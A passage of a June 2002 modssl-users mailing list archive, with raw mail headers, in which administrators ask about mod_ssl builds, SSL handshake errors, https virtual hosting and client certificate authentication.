> www.modssl.org
> > >User Support Mailing List                      
> modssl-users@modssl.org
> > >Automated List Manager                            
> majordomo@modssl.org
> > >
> > >
> >
> > 
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > User Support Mailing List                      
> modssl-users@modssl.org
> > Automated List Manager                            
> majordomo@modssl.org
> 
> --
> ------
> Adverteren.be - 100% Nederlandstalig adverteren op 
> kwalitatief hoogstaande sites
> !
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 17 21:09:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA23952; Mon, 17 Jun 2002 21:08:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id VAA23904; Mon, 17 Jun 2002 21:07:12 +0200 (MET DST)
Message-Id: <200206171907.VAA23904@opensource.ee.ethz.ch>
Received: from WorldClient [127.0.0.1]
	by sitesontesting.com [127.0.0.1]
	with SMTP (MDaemon.PRO.v5.0.5.R)
	for ; Tue, 18 Jun 2002 00:24:33 +0530
Date: Tue, 18 Jun 2002 00:24:23 +0530
From: "Prachait Saxena" 
To: modssl-users@modssl.org
Subject: mod_ssl for Apache 1.3.24 + Win98???
X-Mailer: WorldClient 5.0.5
X-MDRemoteIP: 127.0.0.1
X-Return-Path: subscription@sitesontesting.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Prachait Saxena" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello 

I am search for SSL module for Apache 1.3.24 but unable to find.
I have mod_ssl for apache 1.3.22 NOT WORKING

Can any one, send me the link for mod_ssl + Apache 1.3.24 + Win98

Thanks is advance

Prachait Saxena
WebMaster [SitesOnTesting.Com]

If you do for other's ! Other's will do for you !!
Visit me at http://www.sitesontesting.com/prachait


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 18 00:14:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA04453; Tue, 18 Jun 2002 00:12:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sheffield.cnchost.com id AAA04405; Tue, 18 Jun 2002 00:11:19 +0200 (MET DST)
Received: from LAP012 (host-30.whitepj.net [63.145.241.30] (may be forged))
	by sheffield.cnchost.com
	id SAA21162; Mon, 17 Jun 2002 18:10:59 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Gilles Gros" 
To: , 
Subject: Problem with SSL
Date: Mon, 17 Jun 2002 15:10:56 -0700
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Gros" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We have since quite a time error in our logs about SSL Handshake.
I am trying to find where does that is coming from.

The trace in the logs is :

httpd_error_log:
----------------
[Mon Jun 17 05:23:48 2002] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?!] (System error follows)
[Mon Jun 17 05:23:48 2002] [error] System: Connection reset by peer (errno:
104)

ssl_engine_log:
---------------
[17/Jun/2002 05:23:48 01476] [info]  Connection to child 8 established
(server www.whitepj.net:443, client 216.116.163.57)
[17/Jun/2002 05:23:48 01476] [info]  Seeding PRNG with 23177 bytes of
entropy
[17/Jun/2002 05:23:48 01476] [trace] OpenSSL: Handshake: start
[17/Jun/2002 05:23:48 01476] [trace] OpenSSL: Loop: before/accept
initialization
[17/Jun/2002 05:23:48 01476] [trace] OpenSSL: Exit: error in SSLv2/v3 read
client hello A
[17/Jun/2002 05:23:48 01476] [error] SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[17/Jun/2002 05:23:48 01476] [error] System: Connection reset by peer
(errno: 104)


It there a way to know what URL is accessed.

It looks like there is no entry in the access_log at that time.

Thanks.

Gilles.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 18 01:48:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA10381; Tue, 18 Jun 2002 01:47:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from alpha13.family.net.nz id BAA10361; Tue, 18 Jun 2002 01:47:06 +0200 (MET DST)
Received: from xtra.co.nz (port-210-54-22-212.fastadsl.net.nz [210.54.22.212])
	by alpha13.family.net.nz (8.11.2/8.11.2) with ESMTP id g5HNko421188
	for ; Tue, 18 Jun 2002 11:46:51 +1200
Message-ID: <3D0E76A7.3050700@xtra.co.nz>
Date: Tue, 18 Jun 2002 11:54:15 +1200
From: David 
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL site loads regardless of URL??
References: <3D0D8E91.6070905@xtra.co.nz> <3D0D9522.6060701@itaction.co.uk>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks for the comments Peter,

The server has real world IP's. I just used 192.. for the example. Which 
probably was dumb as it clouded the issue.

-David

Peter Viertel wrote:
> Virtual hosts are defined agains the listening addresses you have for 
> your host:
> 
> Not sure what some of the host names resolve to but assuming 192.168 
> addresses are the actual ip of your host, and the other ip is the nat 
> outside address for your host then the config would look like this:
> 
> 
> ServerName www.donations.org.nz
> DocumentRoot /var/www/html/donations
> ErrorLog /var/log/httpd/donations-error_log
> TransferLog /var/log/httpd/donations-access_log
> 
> 
> NameVirtualHost 192.168.1.9:80
> 
> 
> ServerName stats.domain1.co.nz
> DocumentRoot /var/www/html/domain1
> ErrorLog /var/log/httpd/domain1-error_log
> TransferLog /var/log/httpd/domain1-access_log
> 
> 
> 
> ServerName stats.domain2.co.nz
> DocumentRoot /var/www/html/domain2
> ErrorLog /var/log/httpd/domain2-error_log
> TransferLog /var/log/httpd/domain2-access_log
> 
> 
> 
> ServerName stats.domain3.co.nz
> DocumentRoot /var/www/html/domain3
> ErrorLog /var/log/httpd/domain3-error_log
> TransferLog /var/log/httpd/domain3-access_log
> 
> 
> 
> David wrote:
> 
>> Hi,
>>
>> I have several virtually hosted web sites and only one site that is
>> configured for SSL on my server.
>>
>> The issue is if someone uses https instead of http the certificated site
>> pages load regardless of the url ie
>>
>> http://stats.domain1.co.nz loads pages from ../domain1 which is correct.
>>
>> https://stats.domain1.co.nz loads pages from ../donations, and the url
>> remains https://stats.domain1.co.nz
>>
>> I assume I have a misconfigured .conf file?
>>
>> How can I resolve this, do I need to specify port 80 on the http sites
>> or do I need to multi home the server with a unique IP for the SSL site?
>>
>>
>> Thanks
>>
>> -David.
>>
>>
>> Below is an illustration of the httpd.conf.
>>
>> 
>> ServerName www.donations.org.nz
>> DocumentRoot /var/www/html/donations
>> ErrorLog /var/log/httpd/donations-error_log
>> TransferLog /var/log/httpd/donations-access_log
>> 
>>
>> NameVirtualHost 219.88.240.45
>>
>> 
>> ServerName stats.domain1.co.nz
>> DocumentRoot /var/www/html/domain1
>> ErrorLog /var/log/httpd/domain1-error_log
>> TransferLog /var/log/httpd/domain1-access_log
>> 
>>
>> 
>> ServerName stats.domain2.co.nz
>> DocumentRoot /var/www/html/domain2
>> ErrorLog /var/log/httpd/domain2-error_log
>> TransferLog /var/log/httpd/domain2-access_log
>> 
>>
>> 
>> ServerName stats.domain3.co.nz
>> DocumentRoot /var/www/html/domain3
>> ErrorLog /var/log/httpd/domain3-error_log
>> TransferLog /var/log/httpd/domain3-access_log
>> 
>>
>>
>>
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
> 
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 18 06:28:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA04905; Tue, 18 Jun 2002 06:27:57 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from alpha13.family.net.nz id GAA04640; Tue, 18 Jun 2002 06:26:25 +0200 (MET DST)
Received: from xtra.co.nz (port-210-54-22-212.fastadsl.net.nz [210.54.22.212])
	by alpha13.family.net.nz (8.11.2/8.11.2) with ESMTP id g5I0ex423983
	for ; Tue, 18 Jun 2002 12:40:59 +1200
Message-ID: <3D0E8358.9090009@xtra.co.nz>
Date: Tue, 18 Jun 2002 12:48:24 +1200
From: David 
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL site loads regardless of URL??
References: <3D0D8E91.6070905@xtra.co.nz> <3D0D9522.6060701@itaction.co.uk>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I tried adding port 80 to the virtual hosts as you suggested but the 
issue still persists?

-David.


Peter Viertel wrote:
> Virtual hosts are defined agains the listening addresses you have for 
> your host:
> 
> Not sure what some of the host names resolve to but assuming 192.168 
> addresses are the actual ip of your host, and the other ip is the nat 
> outside address for your host then the config would look like this:
> 
> 
> ServerName www.donations.org.nz
> DocumentRoot /var/www/html/donations
> ErrorLog /var/log/httpd/donations-error_log
> TransferLog /var/log/httpd/donations-access_log
> 
> 
> NameVirtualHost 192.168.1.9:80
> 
> 
> ServerName stats.domain1.co.nz
> DocumentRoot /var/www/html/domain1
> ErrorLog /var/log/httpd/domain1-error_log
> TransferLog /var/log/httpd/domain1-access_log
> 
> 
> 
> ServerName stats.domain2.co.nz
> DocumentRoot /var/www/html/domain2
> ErrorLog /var/log/httpd/domain2-error_log
> TransferLog /var/log/httpd/domain2-access_log
> 
> 
> 
> ServerName stats.domain3.co.nz
> DocumentRoot /var/www/html/domain3
> ErrorLog /var/log/httpd/domain3-error_log
> TransferLog /var/log/httpd/domain3-access_log
> 
> 
> 
> David wrote:
> 
>> Hi,
>>
>> I have several virtually hosted web sites and only one site that is
>> configured for SSL on my server.
>>
>> The issue is if someone uses https instead of http the certificated site
>> pages load regardless of the url ie
>>
>> http://stats.domain1.co.nz loads pages from ../domain1 which is correct.
>>
>> https://stats.domain1.co.nz loads pages from ../donations, and the url
>> remains https://stats.domain1.co.nz
>>
>> I assume I have a misconfigured .conf file?
>>
>> How can I resolve this, do I need to specify port 80 on the http sites
>> or do I need to multi home the server with a unique IP for the SSL site?
>>
>>
>> Thanks
>>
>> -David.
>>
>>
>> Below is an illustration of the httpd.conf.
>>
>> 
>> ServerName www.donations.org.nz
>> DocumentRoot /var/www/html/donations
>> ErrorLog /var/log/httpd/donations-error_log
>> TransferLog /var/log/httpd/donations-access_log
>> 
>>
>> NameVirtualHost 219.88.240.45
>>
>> 
>> ServerName stats.domain1.co.nz
>> DocumentRoot /var/www/html/domain1
>> ErrorLog /var/log/httpd/domain1-error_log
>> TransferLog /var/log/httpd/domain1-access_log
>> 
>>
>> 
>> ServerName stats.domain2.co.nz
>> DocumentRoot /var/www/html/domain2
>> ErrorLog /var/log/httpd/domain2-error_log
>> TransferLog /var/log/httpd/domain2-access_log
>> 
>>
>> 
>> ServerName stats.domain3.co.nz
>> DocumentRoot /var/www/html/domain3
>> ErrorLog /var/log/httpd/domain3-error_log
>> TransferLog /var/log/httpd/domain3-access_log
>> 
>>
>>
>>
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
> 
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 18 07:59:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA08771; Tue, 18 Jun 2002 07:58:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from europa.cox-internet.com id HAA08752; Tue, 18 Jun 2002 07:57:49 +0200 (MET DST)
Received: from [208.180.124.67] by europa.cox-internet.com
          (InterMail vK.4.03.05.03 201-232-132-103 license 180e1de7f543f89455b24e508f9cca39)
          with ESMTP id <20020618025800.EOWK27180.europa@[208.180.124.67]>
          for ; Mon, 17 Jun 2002 21:58:00 -0500
User-Agent: Microsoft-Entourage/10.0.0.1309
Date: Mon, 17 Jun 2002 22:02:33 -0500
Subject: Handshake failure help, please
From: "Scott Carpenter, Software Wizards" 
To: 
Message-ID: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Scott Carpenter, Software Wizards" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have a Windows 2000 Server running the Apache with mod_ssl.
When I use the openssl s_client -connect 216.139.210.182:443 to connect,
It gives me an error on line 226 of some c file and says "SSL handshake
error". The SSL web server is configured as a virtual host. It is also going
through a firewall. When I do not go through the firewall and use all local
IP addresses on the console, it works OK.  What firewall settings must I
make sure of?  Any other clues?

Scott

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 18 10:44:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA17508; Tue, 18 Jun 2002 10:43:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id KAA17464; Tue, 18 Jun 2002 10:42:23 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GXW86G00.R0U for ; Tue, 18 Jun 2002
          09:42:16 +0100 
Message-ID: <3D0EF263.5000005@itaction.co.uk>
Date: Tue, 18 Jun 2002 09:42:11 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL site loads regardless of URL??
References: <3D0D8E91.6070905@xtra.co.nz> <3D0D9522.6060701@itaction.co.uk> <3D0E8358.9090009@xtra.co.nz>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I went back and read your question again, and can see I missed your 
problem entirely.

You can only have one SSL certificate per IP - that is to say that 
namevirtualhost does work on https, but always only one cert.. .this is 
because of the number one most FAQ on this list which is what Ralf 
describes as 'Some sort of chicken and egg problem' in his mod_ssl FAQ.

If you want to make it so your ssl pages only come up when the client 
uses the right hostname then try this hack:

NameVirtualHost 192.168.1.9:443


ServerName oddshostnames
RewriteEngine On
RewriteRule    ^    [F,L]



ServerName www.donations.org.nz
DocumentRoot /var/www/html/donations
ErrorLog /var/log/httpd/donations-error_log
TransferLog /var/log/httpd/donations-access_log



David wrote:

> Hi,
>
> I tried adding port 80 to the virtual hosts as you suggested but the
> issue still persists?
>
> -David.
>
>
> Peter Viertel wrote:
>
>> Virtual hosts are defined agains the listening addresses you have for
>> your host:
>>
>> Not sure what some of the host names resolve to but assuming 192.168
>> addresses are the actual ip of your host, and the other ip is the nat
>> outside address for your host then the config would look like this:
>>
>> 
>> ServerName www.donations.org.nz
>> DocumentRoot /var/www/html/donations
>> ErrorLog /var/log/httpd/donations-error_log
>> TransferLog /var/log/httpd/donations-access_log
>> 
>>
>> NameVirtualHost 192.168.1.9:80
>>
>> 
>> ServerName stats.domain1.co.nz
>> DocumentRoot /var/www/html/domain1
>> ErrorLog /var/log/httpd/domain1-error_log
>> TransferLog /var/log/httpd/domain1-access_log
>> 
>>
>> 
>> ServerName stats.domain2.co.nz
>> DocumentRoot /var/www/html/domain2
>> ErrorLog /var/log/httpd/domain2-error_log
>> TransferLog /var/log/httpd/domain2-access_log
>> 
>>
>> 
>> ServerName stats.domain3.co.nz
>> DocumentRoot /var/www/html/domain3
>> ErrorLog /var/log/httpd/domain3-error_log
>> TransferLog /var/log/httpd/domain3-access_log
>> 
>>
>>
>> David wrote:
>>
>>> Hi,
>>>
>>> I have several virtually hosted web sites and only one site that is
>>> configured for SSL on my server.
>>>
>>> The issue is if someone uses https instead of http the certificated 
>>> site
>>> pages load regardless of the url ie
>>>
>>> http://stats.domain1.co.nz loads pages from ../domain1 which is 
>>> correct.
>>>
>>> https://stats.domain1.co.nz loads pages from ../donations, and the url
>>> remains https://stats.domain1.co.nz
>>>
>>> I assume I have a misconfigured .conf file?
>>>
>>> How can I resolve this, do I need to specify port 80 on the http sites
>>> or do I need to multi home the server with a unique IP for the SSL 
>>> site?
>>>
>>>
>>> Thanks
>>>
>>> -David.
>>>
>>>
>>> Below is an illustration of the httpd.conf.
>>>
>>> 
>>> ServerName www.donations.org.nz
>>> DocumentRoot /var/www/html/donations
>>> ErrorLog /var/log/httpd/donations-error_log
>>> TransferLog /var/log/httpd/donations-access_log
>>> 
>>>
>>> NameVirtualHost 219.88.240.45
>>>
>>> 
>>> ServerName stats.domain1.co.nz
>>> DocumentRoot /var/www/html/domain1
>>> ErrorLog /var/log/httpd/domain1-error_log
>>> TransferLog /var/log/httpd/domain1-access_log
>>> 
>>>
>>> 
>>> ServerName stats.domain2.co.nz
>>> DocumentRoot /var/www/html/domain2
>>> ErrorLog /var/log/httpd/domain2-error_log
>>> TransferLog /var/log/httpd/domain2-access_log
>>> 
>>>
>>> 
>>> ServerName stats.domain3.co.nz
>>> DocumentRoot /var/www/html/domain3
>>> ErrorLog /var/log/httpd/domain3-error_log
>>> TransferLog /var/log/httpd/domain3-access_log
>>> 
>>>
>>>
>>>
>>>
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>
>>
>>
>>
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 18 17:00:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA08817; Tue, 18 Jun 2002 16:59:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from PROXYWACME id QAA08804; Tue, 18 Jun 2002 16:58:39 +0200 (MET DST)
Received: FROM glauco.it BY PROXYWACME ; Tue Jun 18 16:53:06 2002 +0200
Message-ID: <3D0F58DA.6E73E196@glauco.it>
Date: Tue, 18 Jun 2002 16:59:22 +0100
From: Daniela Prestipino 
X-Mailer: Mozilla 4.77 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Authentication client and SSLWallet directive 
Content-Type: multipart/alternative;
 boundary="------------EA561FF5D64D2FDBC3776AAE"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniela Prestipino 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--------------EA561FF5D64D2FDBC3776AAE
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi to all,
How can I enable the SSL protocol with authentication client in:
9iAS release 2 for LINUX with
Apache 1.3.22
mod_ossl 9.0.2.0.0
OpenSSL 0.9.6-3 ????

The ssl directive in file httpd.conf  SSLCACertificateFile is not valid
(and if it's present then apache doesn't restart).

In httpd.conf there is the SSLWallet directive:
#   The server wallet contains the server's certificate, private key
#   and trusted certificates. Set SSLWallet at the wallet directory
#   using the syntax:  file:
SSLWallet file:/home/oracle/OraHome1/Apache/Apache/conf/ssl.wlt/default

Is this the correct directive for the Authentication client ?
If yes:
Have I store in directory default the client Certification Authority
certificate?
Which is the certificate format?
Where can I find documentation related to SSLWallet directive?

Thanks in advance
Daniela




--
    Daniela Prestipino
    d.prestipino@glauco.it

    I.D.S.,
    Informatica Distribuita e Software srl
    Via Consolare Pompea 19
    98168 Messina ITALIA
    Tel.: +39 90 353638
    Fax : +39 90 3500063


--------------EA561FF5D64D2FDBC3776AAE
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit



Hi to all,

How can I enable the SSL protocol with authentication client in:

9iAS release 2 for LINUX with

Apache 1.3.22

mod_ossl 9.0.2.0.0

OpenSSL 0.9.6-3 ????

The ssl directive in file httpd.conf  SSLCACertificateFile is not
valid (and if it's present then apache doesn't restart).

In httpd.conf there is the SSLWallet directive:

#   The server wallet contains the server's certificate,
private key

#   and trusted certificates. Set SSLWallet at the wallet
directory

#   using the syntax:  file:<path-to-wallet-directory>

SSLWallet file:/home/oracle/OraHome1/Apache/Apache/conf/ssl.wlt/default

Is this the correct directive for the Authentication client ?

If yes:

Have I store in directory default the client Certification Authority
certificate?

Which is the certificate format?

Where can I find documentation related to SSLWallet directive?

Thanks in advance

Daniela

 

 

 

--

    Daniela Prestipino

    d.prestipino@glauco.it

    I.D.S.,

    Informatica Distribuita e Software srl

    Via Consolare Pompea 19

    98168 Messina ITALIA

    Tel.: +39 90 353638

    Fax : +39 90 3500063

 

--------------EA561FF5D64D2FDBC3776AAE--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 18 18:17:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA14663; Tue, 18 Jun 2002 18:16:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from melanieb.vtt.fi id SAA14595; Tue, 18 Jun 2002 18:15:38 +0200 (MET DST)
Received: from mailgw.vtt.fi (localhost [127.0.0.1])
	by melanieb.vtt.fi (8.9.3/8.9.3) with ESMTP id TAA07906
	for ; Tue, 18 Jun 2002 19:15:37 +0300 (EEST)
Received: from vttmail.vtt.fi (vttmail.vtt.fi [130.188.1.4])
	by mailgw.vtt.fi (8.12.2/8.12.2) with ESMTP id g5IGFaI5020630
	for ; Tue, 18 Jun 2002 19:15:37 +0300 (EEST)
Received: from tte1083.vtt.fi (tte1083.tte.vtt.fi [130.188.68.129])
	by vttmail.vtt.fi (8.9.3/8.9.3) with ESMTP id TAA28395
	for ; Tue, 18 Jun 2002 19:15:36 +0300 (EET DST)
Message-Id: <4.3.2.7.2.20020618182350.00c09650@vttmail.vtt.fi>
X-Sender: tteter@vttmail.vtt.fi
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Tue, 18 Jun 2002 19:15:28 +0300
To: modssl-users@modssl.org
From: Renne Tergujeff 
Subject: Client authentication fails - why (oh why) ?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Renne Tergujeff 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all,
After studying various guides and mail archives for days and days, with no 
luck, I'm now turning to you.
I would really appreciate some advice -- any advice. Thanks in advance!

Case & situation:

I need to arrange SOAP connection with both client and server side 
authentication. Currently using Tomcat 4.0.3, Apache 1.3.22, OpenSSL 0.9.6c 
and mod_ssl 2.8.8. Plus Apache SOAP 2.3. And it's working, as long as I 
only require server authentication. The server certificate is certified by 
a CA, which is created by myself. The CA certificate is in the client's 
keystore and thus the server certificate offered by the server is 
recognized. Nice and fine.

Problem:

A client certificate has been certified by the same aforementioned, 
self-made CA. This certificate is in the client keystore. Apache/modssl 
correctly sends the CA certificate to the client in the SSL 
CertificateRequest phase. AFAIK, this should result in the client 
certificate being accepted. The problem of course is, it never does that.


Some data:

* The client is Win NT 4, the server is Redhat Linux.

* The error message in ssl_engine_log is: OpenSSL: error:140890C7:SSL 
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate 
[Hint: No CAs known to server for verification?]

* httpd.conf includes:
	SSLCertificateFile [the_correct_path_to]/server.crt
	SSLCertificateKeyFile [the_correct_path_to]/server.key
	SSLCACertificateFile [the_correct_path_to]/cacert.pem
	SSLVerifyClient require
	SSLVerifyDepth  1

* Because the client authentication fails, server closes the connection, 
which at the client side results in: Exception while waiting for close 
java.net.SocketException: Cannot send after socket shutdown: JVM_recv in 
socket input stream read

* Some pondering follows... As far as I understand, having the client 
certificate in the server keystore is not necessary, as Apache/modssl sends 
the CA certificate pointed to in SSLCACertificateFile directive. Am I right 
in that? At least doing so didn't improve the situation. In fact, I don't 
think Apache looks into the keystore at all... how about that, am I right 
there? :-) And how about this: does it matter where I create the client 
certificate, on the server or on the client -- as long as I fill in the 
same data? And finally: besides the obvious(?) PEM/DER format differences, 
does it matter if I use openssl or keytool for certificate creation etc.?


Now I'd cross my fingers if I did that -- hoping for some replies.
Thank you and have a nice day,

Renne Tergujeff
VTT Information Technology
Espoo, Finland

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 18 22:59:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA02661; Tue, 18 Jun 2002 22:58:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dragon.goamerica.net id WAA02639; Tue, 18 Jun 2002 22:57:51 +0200 (MET DST)
Received: by hunter.goamerica.net with Internet Mail Service (5.5.2653.19)
	id <2F00PSK5>; Tue, 18 Jun 2002 16:52:15 -0400
Message-ID: <304CFC651EDCD4118AA800D0B774AFB36F4A50@hunter.goamerica.net>
From: Shon Stephens 
To: "'modssl-users@modssl.org'" 
Subject: compiling openssl for modssl - help!
Date: Tue, 18 Jun 2002 16:52:14 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
